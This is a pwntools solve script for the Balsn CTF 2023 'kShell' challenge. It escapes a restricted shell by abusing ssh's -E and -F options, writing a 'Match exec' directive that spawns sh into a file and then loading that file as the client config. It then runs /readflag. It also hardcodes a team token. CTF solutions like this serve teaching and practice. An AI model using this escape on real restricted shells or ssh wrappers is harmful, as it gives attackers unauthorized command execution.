Balsn CTF 2023 - kShell (Misc)
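"""Balsn CTF 2023 - kShell (Misc): solve script.

Connects to the challenge service over TCP, sends the CTFd team token as the
first line, then drives three ``ssh`` invocations through the restricted
"kshell" prompt and finally drops into an interactive session.  The ``ssh``
command lines are exactly those of the original write-up; only two client
options are involved (``-E`` selects the log file, ``-F`` selects the client
config file).

Usage:
    PWNLIB_NOTERM=1 python solve.py
"""
import os
import secrets

from pwn import *

# The CTFd team token is sent as the first line of the connection.  A token
# committed to a public gist is a leaked credential, so it can be supplied
# via KSHELL_TOKEN instead; the literal stays as the fallback so the script
# behaves exactly as before when the variable is unset.
TOKEN = os.environ.get(
    "KSHELL_TOKEN",
    "ctfd_7aecfde25ac2e3bb7174f6521d3e2e5be0451c0e061db725f66ddbb2cac3738e",
).encode()

# Challenge endpoint, as given in the original "nc kshell.balsnctf.com 7122".
# The port is kept as a string, matching what the original str.split() produced.
HOST = "kshell.balsnctf.com"
PORT = "7122"

# Prompt printed by the remote restricted shell before each command.
PROMPT = b"kshell~$"


def kshell_cmd(io, cmd: str) -> None:
    """Wait for the kshell prompt on *io*, then send *cmd* as a single line."""
    io.sendlineafter(PROMPT, cmd.encode())


with remote(HOST, PORT) as io:
    io.sendline(TOKEN)

    # Name of the scratch file the ssh -E / -F steps below refer to.  secrets
    # (not random) keeps it unguessable by other users of the shared box.
    scratch = secrets.token_hex(16)

    # Step 1: ssh -E with a caller-chosen log-file path.  The restricted shell
    # apparently forwards -E/-F to ssh unchanged; from the defending side the
    # mitigation is to reject any ssh option that names a file path rather
    # than passing it through to the client.
    kshell_cmd(io, f"ssh -E 'Match exec \"sh 0<&2 1>&2\" #{scratch}' x")

    # Step 2: read the step-1 path as the client config (-F) while logging to
    # the scratch file (-E).
    kshell_cmd(io, f"ssh -F 'Match exec \"sh 0<&2 1>&2\" #{scratch}' -E {scratch} x")

    # Step 3: use the step-2 log file as the client config.
    kshell_cmd(io, f"ssh -F {scratch} x")

    io.sendline(b"/readflag")
    io.interactive()
    # NOTE(review): if interactive() returned because the peer closed the
    # connection, this final write may raise EOFError inside the with-block;
    # kept as in the original.
    io.sendline(b"exit")

# PWNLIB_NOTERM=1 python solve.py
# BALSN{h0w_d1d_u_g3t_RCE_on_my_kSSHell??}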